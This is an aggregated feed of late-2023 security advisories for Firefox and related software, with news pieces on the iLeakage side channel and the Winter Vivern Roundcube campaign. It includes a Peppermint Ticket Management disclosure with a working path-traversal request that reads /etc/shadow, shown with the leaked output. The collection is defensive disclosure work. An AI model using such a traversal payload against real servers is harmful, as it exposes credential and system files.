Red Hat Security Advisory 2023-6190-01 - An update for firefox is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6190.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: firefox security updateAdvisory ID:        RHSA-2023:6190-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:6190Issue date:         2023-10-30Revision:           01CVE Names:          CVE-2023-44488====================================================================Summary: An update for firefox is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.This update upgrades Firefox to version 115.4.0 ESR.Security Fix(es):* libvpx: crash related to VP9 encoding in libvpx (CVE-2023-44488)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-44488References:https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2023-6190-01

Ubuntu Security Notice 6456-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. Kelsey Gilbert discovered that Firefox did not properly manage certain browser prompts and dialogs due to an insufficient activation-delay. An attacker could potentially exploit this issue to perform clickjacking.

    ==========================================================================Ubuntu Security Notice USN-6456-1October 30, 2023firefox vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user weretricked into opening a specially crafted website, an attacker couldpotentially exploit these to cause a denial of service, obtain sensitiveinformation across domains, or execute arbitrary code. (CVE-2023-5722,CVE-2023-5724, CVE-2023-5728, CVE-2023-5729, CVE-2023-5730, CVE-2023-5731)Kelsey Gilbert discovered that Firefox did not properly manage certainbrowser prompts and dialogs due to an insufficient activation-delay. Anattacker could potentially exploit this issue to perform clickjacking.(CVE-2023-5721)Daniel Veditz discovered that Firefox did not properly validate a cookiecontaining invalid characters. An attacker could potentially exploit thisissue to cause a denial of service. (CVE-2023-5723)Shaheen Fazim discovered that Firefox did not properly validate the URLsopen by installed WebExtension. An attacker could potentially exploit thisissue to obtain sensitive information. (CVE-2023-5725)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  firefox                         119.0+build2-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-6456-1  CVE-2023-5721, CVE-2023-5722, CVE-2023-5723, CVE-2023-5724,  CVE-2023-5725, CVE-2023-5728, CVE-2023-5729, CVE-2023-5730,  CVE-2023-5731Package Information:  https://launchpad.net/ubuntu/+source/firefox/119.0+build2-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6456-1

Peppermint Ticket Management through 0.2.4 allows remote attackers to read arbitrary files via a /api/v1/ticket/1/file/download?filepath=../ POST request.

**Description**

When downloading a file attached to a ticket, it was observed to be able to download arbitrary files off the web server due to the filepath query parameter not being validated and passed directly to fs.createReadStream. Instructions to download and run the latest release were followed from here: https://github.com/Peppermint-Lab/peppermint/tree/master#-installation-with-docker

**Steps to Reproduce**

1.  Login to the application.
2.  Create a new ticket.
3.  Upload a file.
4.  Download the file and intercept the request in Burp Suite.
5.  Change the filepath parameter to "../../../../../../etc/shadow" or "../../../../../../etc/passwd" or "./.env"

**Proof of Concept Request and Response**

Request:

    POST /api/v1/ticket/1/file/download?filepath=../../../../../../etc/shadow HTTP/1.1
    Host: localhost:5000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.00) Gecko/20100101 Firefox/118.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Referer: http://localhost:5000/ticket/1
    Content-Type: multipart/form-data; boundary=---------------------------9995410711832151211174726991
    Content-Length: 61
    Origin: http://localhost:5000
    Connection: close
    Cookie: token=<omitted>
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    -----------------------------9995410711832151211174726991--
    
    

Response:

    HTTP/1.1 200 OK
    Date: Sat, 14 Oct 2023 23:28:05 GMT
    Connection: close
    Content-Length: 476
    
    root:!::0:::::
    bin:!::0:::::
    daemon:!::0:::::
    adm:!::0:::::
    lp:!::0:::::
    sync:!::0:::::
    shutdown:!::0:::::
    halt:!::0:::::
    mail:!::0:::::
    news:!::0:::::
    uucp:!::0:::::
    operator:!::0:::::
    man:!::0:::::
    postmaster:!::0:::::
    cron:!::0:::::
    ftp:!::0:::::
    sshd:!::0:::::
    at:!::0:::::
    squid:!::0:::::
    xfs:!::0:::::
    games:!::0:::::
    cyrus:!::0:::::
    vpopmail:!::0:::::
    ntp:!::0:::::
    smmsp:!::0:::::
    guest:!::0:::::
    nobody:!::0:::::
    node:!:<omitted for security>
    nextjs:!:<omitted for security>
    

**Impact**

Allowing users to download system files, such as /etc/passwd, /etc/shadow, configuration files, application source code, and other users files. The etc/shadow file and .env file were able to be retrieved through the app.

**References**

https://cwe.mitre.org/data/definitions/22.html  
https://portswigger.net/web-security/file-path-traversal

CVE-2023-46864: Path Traversal - Arbitrary File Download · Issue #171 · Peppermint-Lab/peppermint

By Deeba Ahmed
What happens in iLeakage attacks is that the CPU is tricked into executing speculative code that reads sensitive data from memory. 
This is a post from HackRead.com Read the original post: iLeakage Attack: Theft of Sensitive Data from Apple’s Safari Browser

A team of researchers comprising Georgia Tech’s cybersecurity professors, Daniel Genkin and Jason Kim, University of Michigan’s Stephan van Schaik, and Ruhr University Bochum’s Yuval Yarom have published a research paper explaining a vulnerability they discovered in Apple devices that affects Macs and iPhones.

Researchers explained in the paper titled “iLeakage: Browser-based Timerless Speculative Execution Attacks on Apple Devices,” that the vulnerability, dubbed iLeakage, has been affecting Macs and iPhones since 2020. The attack mainly affects those devices that were built with Apple’s Arm-based A-series and M-series chips.

Researchers devised an attack that forced Apple’s Safari browser to divulge passwords, Gmail content, and other sensitive data by exploiting a side channel vulnerability in the CPUs. 

This vulnerability is built off an existing attack technique used on CPUs for over six years. Back in 2018, security researchers reported that all modern CPUs can be exploited to leak sensitive data by exploiting an integral feature on the processor called Speculative Execution. 

In this technique, modern CPUs try to improve performance by executing instructions before they know it is needed. iLeakage is a browser-based attack exploiting a timerless speculative execution flaw in Apple devices. Timerless speculative execution lets the CPU execute instructions even without any time running. The attackers can exploit this to perform malicious operations without getting detected.

What happens in iLeakage attacks is that the CPU is tricked into executing speculative code that reads sensitive data from memory. The attacker can exfiltrate this data without alerting the user. It is a dangerous attack because adversaries can perform them without needing the victim to click on malicious links or open infected documents/attachments.

The flaw exists in the way the Safari browser handles JavaScript timers. This allows attackers to create malicious JavaScript code and use it to steal sensitive data from the device. The stolen data may include passwords, PII (personal identification information), and credit card numbers. Using this data, attackers can commit crimes like identity theft and fraud.

Researchers noted that iLeakage attacks are currently effective on Apple devices running Safari. However, other platforms or browsers may also be vulnerable. Therefore, it is essential to exercise caution to prevent iLeakage attacks. Always keep your software up-to-date and use a security solution that can detect/block speculative execution attacks.

The findings were disclosed to Apple on 12 September 2022. The company acknowledged this issue, and Apple’s Product Security team and Safari browser development team collaborated with the researchers to develop countermeasures. As a result, Apple refactored Safari’s multi-process architecture. These changes are currently under active development and are available in Safari Technology Preview versions 173 and above.

Apple has released a new inter-process communication API to spawn new processes for pages launched with window.open(). Researchers have confirmed that the patch mitigates iLeakage attacks by preventing the consolidation of domains across security boundaries but it has limitations.

“We have empirically verified that this patch mitigates our attack by preventing the consolidation of domains across security boundaries. This means that while it is still possible to escape the speculative JavaScript sandbox, an attacker will only be able to read their own address space and therefore their own data,” researchers concluded.

The full report can be accessed here (PDF), and there is a dedicated site available to demonstrate the iLeakage attack.

Regarding this research, Lionel Litty, Chief Security Architect at Menlo Security, a Mountain View, Calif.-based provider of browser security stated that this attack shows browsers are the new OS. 

“This attack illustrates how for both attackers and defenders, the browser is the new OS, with web primitives such as origins and web workers that parallel OS primitives, such as applications and threads. Security practitioners must educate themselves on this attack surface.”

John Gallagher, Vice President of Viakoo Labs at Viakoo, a Mountain View, Calif.-based provider of automated IoT cyber hygiene noted that this attack method is not as significant as is the realization that threats are continually evolving. 

“The significance is not necessarily in this as an attack method, but more in how threats are evolving based on the tradeoff between speed and security. Prefetching of information to speed up CPU execution has been around for a while, and equally has been exploited for a while.  This is just a further “tit for tat”, and will be remediated in future CPU development.”

Gallagher, however, claims that in this attack, organizations aren’t at high risk because this attack requires a high degree of sophistication and there aren’t any reports that it has been exploited in the wild. 

“Organizations are not at high risk, given that this attack method requires a high degree of sophistication by the threat actor and has not been seen exploited yet in the wild (or at least not reported).  Organizations concerned (or high-value individual targets) should consider enabling lockdown mode, or using the MacOS (unstable) patch available,” Gallagher stated.

1.  According to Chrome, Safari and FireFox ThePirateBay is a Phishing Site
2.  Hackers Pwned Apple Safari in 20 seconds; Google Pixel in 60 seconds
3.  Bug in Safari browser leaks personal identifiers and browsing activity
4.  Apple Safari Safest, Google Chrome Riskiest Browser of 2022- Study

iLeakage Attack: Theft of Sensitive Data from Apple’s Safari Browser

An issue was discovered in VERMEG AgileReporter 21.3. XXE can occur via an XML document to the Analysis component.

CVE-2022-34832: XXE in AgileReporter 21.3 by VERMEG

The "iLeakage" attack affects all recent iPhone, iPad, and MacBook models, allowing attackers to peruse your Gmail inbox, steal your Instagram password, or scrutinize your YouTube history.

Researchers have developed a side-channel exploit for Apple CPUs, enabling sophisticated attackers to extract sensitive information from browsers.

Side-channel attacks are usually overlooked, often physical counterparts to traditional software hacks. Rather than an unsecured password or a vulnerability in a program, they take advantage of the extra information a computer system or hardware generates — in the form of sound, light, or electromagnetic radiation, for example, or in the time it takes to complete certain computations (a timing attack).

On Wednesday, four researchers — including two of those responsible for uncovering the Spectre processor vulnerability back in 2018 — published the details of such an attack, which they've named "iLeakage," affecting all recent iPhone, iPad, and MacBook models.

The researchers informed Apple of their findings on Sept. 12, 2022, according to their website, and the company has since developed a mitigation. However, it's still considered unstable, it's not enabled on devices by default, and mitigating is only possible on Macs, not mobile devices.

In comments provided to Dark Reading on background, an Apple spokesperson wrote, "This proof of concept advances our understanding of these types of threats. We are aware of the issue and it will be addressed in our next scheduled software release."

**How iLeakage Works**

iLeakage takes advantage of A- and M-series Apple silicon CPUs' capacity to perform speculative execution.

Speculative execution is a method by which modern CPUs predict tasks before they're even prompted, in order to speed up information processing. "This technique has been around for over 20 years, and today all modern CPUs use it — it significantly speeds up processing, even accounting for times it might get the anticipated instructions wrong," explains John Gallagher, vice president of Viakoo Labs.

The rub is that "cache inside the CPU holds a lot of valuable data, including what might be staged for upcoming instructions. iLeakage uses the Apple WebKit capabilities inside a browser to use JavaScript to gain access to those contents."

Specifically, the researchers used a new speculation-based gadget to read the contents of another webpage when a victim clicked on their malicious webpage.

"Alone, WebKit would not enable the cache contents to be divulged, nor would how A-Series and M-Series perform speculative execution — it's the combination of the two together that leads to this exploit," Gallagher explains.

**A Successor to Meltdown/Spectre**

"This builds on a line of attacks against CPU vulnerabilities that started around 2017 with Meltdown and Spectre," Lionel Litty, chief security architect at Menlo Security points out. "High level, you want to think about applications and processes, and trust that the operating system with help from the hardware is properly isolating these from one another," but those two exploits broke the fundamental isolation between different applications, and an application and operating system, that we tend to take for granted as users, he says.

iLeakage, then, is a spiritual successor that focuses on breaking the isolation between browser tabs.

The good news is, in their website's FAQ section, the researchers described iLeakage as "a significantly difficult attack to orchestrate end-to-end," which "requires advanced knowledge of browser-based side-channel attacks and Safari's implementation." They also noted that successful exploitation hasn't been demonstrated in the wild.

Were a capable enough attacker to come along and try it, however, this method is powerful enough to siphon just about any data users traffic online: logins, search histories, credit card details, what have you. In YouTube videos, the researchers demonstrated how their exploit could expose victims' Gmail inboxes, their YouTube watch histories, and their Instagram passwords, as just a few examples.

**iPhone Users Are Especially Affected**

Though it takes advantage of the idiosyncrasies in Safari's JavaScript engine specifically, iLeakage affects all browsers on iOS, because Apple's policies force all iPhone browser apps to use Safari's engine.

"Chrome, Firefox and Edge on iOS are simply wrappers on top of Safari that provide auxiliary features such as synchronizing bookmarks and settings. Consequently, nearly every browser application listed on the App Store is vulnerable to iLeakage," the researchers explained.

iPhone users are doubly in trouble, because the best fix Apple has released thus far only works on MacBooks (and, for that matter, only in an unstable state). But for his part, Gallagher backs Apple's ability to design an effective remediation.

"Chip-level vulnerabilities are typically hard to patch, which is why it is not surprising that there is not a fix for this right now. It will take time, but ultimately if this becomes a real exploited vulnerability a patch will likely be available," he says.

Safari Side-Channel Attack Enables Browser Theft

Debian Linux Security Advisory 5535-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, clickjacking, spoofing or information leaks.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5535-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 25, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2023-5721 CVE-2023-5724 CVE-2023-5725 CVE-2023-5728                 CVE-2023-5730 CVE-2023-5732Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode, clickjacking, spoofing or information leaks.For the oldstable distribution (bullseye), these problems have been fixedin version 115.4.0esr-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 115.4.0esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmU5Z1kACgkQEMKTtsN8TjadIw//WpIFeCszG20DdDXl0HDi9sjn9bctL0ff5buoeWGMx3JHJa2D9vauwDLxnZFzPMfrr8W8ZUZpvFxl1u0n+n9BAfIkPMsjURbDZu6+wembDeVB8d5B2KH667UXhIHeaiEBrkT3wH0alq6HpkaoYkTipfkyerEIcKp2s0AB9L4qpr7RvGaCuyTTzR4Fm4UUCEja1aAFcywlLwDlyNJksNqHfU+LMeLIDIx/FjrT07C7fEB0KCcNNHRXYyEhMLDfmxUkrR/QIopQfsXohLDkodzU+K2J7rpjkgk5StbhLVnh3DVkANpALthySM65iovuDUXCoD7kCpIjshYxYtRioLYtiilRIVudOZ3uU/9TYN7sDXvFiN3OS1gOYk8aMIzHZHLKcp17VBHGP3z7tRlO5p5r/79jFq2aPuY++rIOCrf/rYMnykukgDEx2i6R8bpEfen1P5c7qbPWHqTAxo1EdDmSHGiDpxuhQ4ql+G3xDREoQgaFHWv6IwyBdcGteMNHSj++gy+p9Hcfh84ynzgpoHcl1tbpVeHw/356sKgJRbsIfYZapk3IPEvziWPtGBsZzMqVxxq4cM8yietTi8YXB83Xtutbf5QPUgPmCaHKW7icFI3zkcbhjqxO1GHJT06MsvqLnv8WtDQBPV42NcksVn6ccW0Ydrc+1JyJ2xwF8YpZaN8=DQzK-----END PGP SIGNATURE-----

Debian Security Advisory 5535-1

When opening a page in reader mode, the redirect URL could have caused attacker-controlled script to execute in a reflected Cross-Site Scripting (XSS) attack. This vulnerability affects Firefox for iOS < 119.

**Mozilla Foundation Security Advisory 2023-48**

Announced

October 24, 2023

Impact

high

Products

Firefox for iOS

Fixed in

*   Firefox for iOS 119

**#CVE-2023-5758: Cross-Site Scripting (XSS) in reader mode**

Reporter

Irwan

Impact

high

**Description**

When opening a page in reader mode, the redirect URL could have caused attacker-controlled script to execute in a reflected Cross-Site Scripting (XSS) attack.

**References**

*   Bug 1850019

CVE-2023-5758: Security Vulnerabilities fixed in Firefox for iOS 119

Memory safety bugs present in Firefox 118. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 119.

**Mozilla Foundation Security Advisory 2023-45**

Announced

October 24, 2023

Impact

high

Products

Firefox

Fixed in

*   Firefox 119

**#CVE-2023-5721: Queued up rendering could have allowed websites to clickjack**

Reporter

Kelsey Gilbert

Impact

high

**Description**

It was possible for certain browser prompts and dialogs to be activated or dismissed unintentionally by the user due to an insufficient activation-delay.

**References**

*   Bug 1830820

**#CVE-2023-5722: Cross-Origin size and header leakage**

Reporter

annevk

Impact

moderate

**Description**

Using iterative requests an attacker was able to learn the size of an opaque response, as well as the contents of a server-supplied Vary header.

**References**

*   Bug 1738426

**#CVE-2023-5723: Invalid cookie characters could have led to unexpected errors**

Reporter

Daniel Veditz

Impact

moderate

**Description**

An attacker with temporary script access to a site could have set a cookie containing invalid characters using document.cookie that could have led to unknown errors.

**References**

*   Bug 1802057

**#CVE-2023-5724: Large WebGL draw could have led to a crash**

Reporter

pwn2car

Impact

moderate

**Description**

Drivers are not always robust to extremely large draw calls and in some cases this scenario could have led to a crash.

**References**

*   Bug 1836705

**#CVE-2023-5725: WebExtensions could open arbitrary URLs**

Reporter

Shaheen Fazim

Impact

moderate

**Description**

A malicious installed WebExtension could open arbitrary URLs, which under the right circumstance could be leveraged to collect sensitive user data.

**References**

*   Bug 1845739

**#CVE-2023-5726: Full screen notification obscured by file open dialog on macOS**

Reporter

Edgar Chen and Hafiizh

Impact

moderate

**Description**

A website could have obscured the full screen notification by using the file open dialog. This could have led to user confusion and possible spoofing attacks.  
_Note: This issue only affected macOS operating systems. Other operating systems are unaffected._

**References**

*   Bug 1846205

**#CVE-2023-5727: Download Protections were bypassed by .msix, .msixbundle, .appx, and .appxbundle files on Windows**

Reporter

Marco Bonardo

Impact

moderate

**Description**

The executable file warning was not presented when downloading .msix, .msixbundle, .appx, and .appxbundle files, which can run commands on a user's computer.  
_Note: This issue only affected Windows operating systems. Other operating systems are unaffected._

**References**

*   Bug 1847180

**#CVE-2023-5728: Improper object tracking during GC in the JavaScript engine could have led to a crash.**

Reporter

anbu

Impact

moderate

**Description**

During garbage collection extra operations were performed on a object that should not be. This could have led to a potentially exploitable crash.

**References**

*   Bug 1852729

**#CVE-2023-5729: Fullscreen notification dialog could have been obscured by WebAuthn prompts**

Reporter

Shaheen Fazim

Impact

low

**Description**

A malicious web site can enter fullscreen mode while simultaneously triggering a WebAuthn prompt. This could have obscured the fullscreen notification and could have been leveraged in a spoofing attack.

**References**

*   Bug 1823720

**#CVE-2023-5730: Memory safety bugs fixed in Firefox 119, Firefox ESR 115.4, and Thunderbird 115.4.1**

Reporter

Jed Davis, Andrew McCreight, Randell Jesup, and the Mozilla Fuzzing Team

Impact

high

**Description**

Memory safety bugs present in Firefox 118, Firefox ESR 115.3, and Thunderbird 115.3. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 119, Firefox ESR 115.4, and Thunderbird 115.4.1

**#CVE-2023-5731: Memory safety bugs fixed in Firefox 119**

Reporter

Steve Fink, Stefan Arentz, and the Mozilla Fuzzing Team

Impact

high

**Description**

Memory safety bugs present in Firefox 118. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 119

CVE-2023-5731: Security Vulnerabilities fixed in Firefox 119

By Waqas
ESET Research Uncovers New Targeted Campaign Impacting European Governments and Think Tanks.
This is a post from HackRead.com Read the original post: APT Winter Vivern Exploits New Roundcube 0-Day to Target European Entities

The new 0-Day vulnerability was actively exploited by the Winter Vivern cyberespionage group before its discovery and subsequent patch by Roundcube, a web-based IMAP email client, with ESET’s report.

The Russian cyberespionage group Winter Vivern (_aka_ TA473, and UAC-0114), known for its persistent attacks on European and Central Asian governments, has once again made headlines. ESET, a Slovak cybersecurity firm, has recently revealed the group’s utilization of a 0-day (zero-day) cross-site scripting (XSS) vulnerability in the Roundcube Webmail server, signaling an alarming escalation in their tactics.

ESET researchers, who have been closely monitoring Winter Vivern’s activities for over a year, discovered the exploitation of this new vulnerability on October 11th, 2023. This XSS vulnerability, identified as CVE-2023-5631, allowed attackers to remotely compromise Roundcube Webmail servers, a popular email platform.

Notably, this vulnerability is distinct from CVE-2020-35730, a previously exploited flaw by the same group, as outlined in ESET’s research.

****Targeted Entities****

The campaign orchestrated by Winter Vivern focused on Roundcube Webmail servers belonging to governmental entities and a think tank, all situated within Europe. This is in line with the group’s primary objective of targeting government institutions and organizations in Europe and Central Asia.

****Modus Operandi****

Winter Vivern is infamous for employing a variety of tactics to infiltrate their targets, including the use of malicious documents, phishing websites, and a custom PowerShell backdoor. While there is a low level of confidence, ESET researchers suggest a potential connection between Winter Vivern and MoustachedBouncer, a Belarus-aligned group.

Since at least 2022, as reported by Hackread.com, Winter Vivern has been known to target Zimbra and Roundcube email servers owned by governmental entities. Additionally, the group exploited CVE-2020-35730, another XSS vulnerability in Roundcube, in August and September 2023.

It is worth mentioning that Winter Vivern is not the only threat actor exploiting Roundcube vulnerabilities. Sednit (also known as APT28) has been seen using the same XSS vulnerability in Roundcube, occasionally targeting the same victims.

****The Exploited Vulnerability (CVE-2023-5631)****

This XSS vulnerability, according to ESET’s blog post, could be exploited remotely by sending a specially crafted email message. In this particular campaign, the emails were sent from the address team.managment@outlookcom with the subject line “Get started in your Outlook.”

The malicious email appeared ordinary at first glance, but upon examining the HTML source code, a concealed SVG tag containing a base64-encoded payload was revealed. The payload was concealed within the onerror attribute of an image tag in the SVG. When decoded, this payload led to the execution of JavaScript code in the victim’s browser.

Surprisingly, the JavaScript injection worked even on fully patched Roundcube instances. The vulnerability was traced back to the server-side script rcube\_washtml.php, which did not adequately sanitize the malicious SVG document before incorporating it into the HTML page interpreted by the user.

ESET researchers reported the issue to Roundcube, and the vulnerability was patched promptly on October 14th, 2023. The affected Roundcube versions include 1.6.x before 1.6.4, 1.5.x before 1.5.5, and 1.4.x before 1.4.15.

The malicious email (ESET)

****Implications and Conclusion****

Winter Vivern’s transition to a 0-day vulnerability is a clear indication of their determination to infiltrate high-value targets. Despite the group’s relatively unsophisticated toolset, they remain a significant threat to European governments. Their success can be attributed to their persistent phishing campaigns and the prevalence of outdated, vulnerable applications used by targeted organizations.

In response to ESET’s discovery, the Roundcube team acted swiftly to address the vulnerability. A disclosure timeline reveals that the vulnerability was reported on October 12, and the necessary patches were released just two days later, ensuring the security of Roundcube Webmail servers.

ESET Research commended the Roundcube developers for their rapid response and collaboration in resolving the issue. It is vital that organizations and government entities keep their software up to date to mitigate the risk of such attacks in the future.

1.  ProtonMail Code Vulnerabilities Leaked Emails
2.  APTs Exploiting WinRAR 0day Flaw Despite Patch Availability
3.  Email Hacking Reigns as Top Cybersecurity Threat, Indusface Study
4.  Russian Hackers Employ Telekopye Toolkit in Broad Phishing Attacks
5.  Mozilla Rushes to Fix Critical Vulnerability in Firefox and Thunderbird
6.  EvilProxy Phishing Kit Targets Microsoft Users via Indeed.com Vulnerability

Tag

#firefox